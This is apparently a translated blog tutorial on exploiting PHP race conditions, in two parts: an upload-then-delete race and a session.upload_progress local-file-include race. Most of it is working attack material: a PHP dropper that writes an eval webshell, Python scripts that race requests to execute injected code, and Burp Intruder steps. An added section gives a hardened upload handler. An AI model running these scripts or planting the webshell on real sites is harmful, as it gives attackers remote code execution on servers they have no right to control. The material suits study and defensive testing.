File upload race condition

Test demo:

<html>
<body>
<form action="" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file"/>  
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php

if (!empty($_FILES)) {
    // The upload is moved into the web root under its client-supplied name and then deleted;
    // the window between these two calls is the race.
    move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
    unlink($_FILES['file']['name']);
}
?>

Shell file contents:

<?php
echo md5(1);
fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');
?>

Python script that keeps requesting the uploaded file:

# coding:utf-8
import requests


def main():
    # Request the uploaded file repeatedly until the md5(1) marker shows that it executed.
    i = 0
    while 1:
        try:
            print(i, end='\r')
            a = requests.get("http://aaa.io/sssss.php")
            if "c4ca4238a0b923820dcc509a6f75849b" in a.text:
                print("OK")
                break
        except Exception as e:
            pass
        i += 1


if __name__ == '__main__':
    main()

where c4ca4238a0b923820dcc509a6f75849b is md5(1).

Burp settings: send the upload request to the Intruder module.


Then run the Python script and start the Burp Intruder attack; the order does not matter, and the race is usually won within a few attempts.
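As an added example (not code from the original post), here is a hardened replacement for the demo handler above. The race exists because the file is placed in the web root under its client-supplied name before any check runs; the fix is to validate it in the temporary location, then store it outside the document root under a server-generated name. UPLOAD_DIR and the allowed types are assumptions for the example.

```php
<?php
// Added example, not from the original post.
// UPLOAD_DIR is an assumed directory that the web server does not serve.
const UPLOAD_DIR = '/var/app/uploads';
// Assumed allowlist: detected MIME type => extension we assign ourselves.
const ALLOWED_MIME = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function store_upload(array $file): ?string
{
    // Accept only a genuine upload that PHP handled for this request.
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Inspect the content while it is still in the temp location, which is not
    // web-accessible, and ignore the client-supplied name and extension entirely.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_MIME[$mime])) {
        return null; // rejected before it is ever reachable by a request
    }

    // Server-generated name: no attacker-controlled extension or path components.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_MIME[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640); // readable by the application, never executable

    return $dest;
}

if (!empty($_FILES['file'])) {
    $stored = store_upload($_FILES['file']);
    echo $stored === null ? 'rejected' : 'stored';
}
```

Because nothing the uploader controls ever lands in a path the web server executes, there is no window for a concurrent GET to hit, regardless of how fast the delete happens.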


Another approach: racing the session file

Demo:

<?php
if (isset($_GET['file'])) {
	include './' . $_GET['file'];
}

In this case we cannot upload a file, so how can this be exploited? By including the session file.

We know that session handling is opened by session_start(); what if that function is never called?

PHP has the session.upload_progress feature, which records the progress of file uploads and is enabled by default.


That is, when our POST request contains a PHP_SESSION_UPLOAD_PROGRESS field, a session is initialized even though session_start() was never called. By default, however, the progress data is removed once the upload finishes, so we need to exploit the race window.

Proof of concept: 1.php

<html>
<body>
<form action="" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888"/>  
<input type="file" name="file"/>  
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
<?php
?> 

Note: the <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888" /> field must come before the <input type="file" name="file" /> field; otherwise the session file name cannot be controlled.


Exploit script:

import io
import requests
import threading

sessid = 'ph1'


def t1(session):
    # Keep sending uploads; the PHP_SESSION_UPLOAD_PROGRESS value is written into the session file.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        response = session.post(
            'http://localhost/2.php',
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=file_put_contents("shell123.php","<?=phpinfo();?>")?>'},
            files={'file': ('a.txt', f)},
            cookies={'PHPSESSID': sessid}
        )


def t2(session):
    # Keep including the session file before PHP cleans it up at the end of the upload.
    while True:
        response = session.get(f'http://localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}')
        print(response.text)


with requests.session() as session:
    uploader = threading.Thread(target=t1, args=(session,))
    uploader.daemon = True
    uploader.start()

    t2(session)

Adjust the target URL and the session file path as needed. Once the race succeeds, shell123.php is created.


Source: www.cnblogs.com/xiaozhiru/p/12639405.html